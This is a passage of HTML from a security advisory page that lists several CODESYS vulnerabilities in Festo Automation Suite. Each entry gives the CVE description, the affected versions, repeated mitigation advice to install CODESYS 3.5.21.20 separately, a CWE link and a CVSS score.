<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/787.html">CWE-787 Out-of-bounds Write</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>9.8</td>
<td>CRITICAL</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2021-33486</a></h3>
<div class="csaf-accordion-content">
<p>All versions of the CODESYS V3 Runtime Toolkit for VxWorks from version V3.5.8.0 and before version V3.5.17.10 have Improper Handling of Exceptional Conditions.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2021-33486">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/755.html">CWE-755 Improper Handling of Exceptional Conditions</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.5</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2021-34593</a></h3>
<div class="csaf-accordion-content">
<p>In CODESYS V2 Runtime Toolkit 32 Bit full and PLCWinNT prior to versions V2.4.7.56 unauthenticated crafted invalid requests may result in several denial-of-service conditions. Running PLC programs may be stopped, memory may be leaked, or further communication clients may be blocked from accessing the PLC.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2021-34593">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/75.html">CWE-75 Failure to Sanitize Special Elements into a Different Plane (Special Element Injection)</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.5</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2021-34595</a></h3>
<div class="csaf-accordion-content">
<p>A crafted request with invalid offsets may cause an out-of-bounds read or write access in CODESYS V2 Runtime Toolkit 32 Bit full and PLCWinNT prior to versions V2.4.7.56, resulting in a denial-of-service condition or local memory overwrite.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2021-34595">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/823.html">CWE-823 Use of Out-of-range Pointer Offset</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>8.1</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H">CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2021-34596</a></h3>
<div class="csaf-accordion-content">
<p>A crafted request may cause a read access to an uninitialized pointer in CODESYS V2 Runtime Toolkit 32 Bit full and PLCWinNT prior to versions V2.4.7.56, resulting in a denial-of-service condition.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2021-34596">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/82.html">CWE-82 Improper Neutralization of Script in Attributes of IMG Tags in a Web Page</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>6.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2021-36763</a></h3>
<div class="csaf-accordion-content">
<p>In CODESYS V3 web server before 3.5.17.10, files or directories are accessible to External Parties.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2021-36763">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/552.html">CWE-552 Files or Directories Accessible to External Parties</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.5</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2021-36764</a></h3>
<div class="csaf-accordion-content">
<p>In CODESYS Gateway V3 before 3.5.17.10, there is a NULL Pointer Dereference. Crafted communication requests may cause a Null pointer dereference in the affected CODESYS products and may result in a denial-of-service condition.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2021-36764">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/476.html">CWE-476 NULL Pointer Dereference</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.5</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2021-36765</a></h3>
<div class="csaf-accordion-content">
<p>In CODESYS EtherNetIP before 4.1.0.0, specific EtherNet/IP requests may cause a null pointer dereference in the downloaded vulnerable EtherNet/IP stack that is executed by the CODESYS Control runtime system.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2021-36765">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/476.html">CWE-476 NULL Pointer Dereference</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.0</td>
<td>7.5</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N">CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2022-1965</a></h3>
<div class="csaf-accordion-content">
<p>Multiple products of CODESYS implement a improper error handling. A low privilege remote attacker may craft a request, which is not properly processed by the error handling. In consequence, the file referenced by the request could be deleted. User interaction is not required.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2022-1965">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
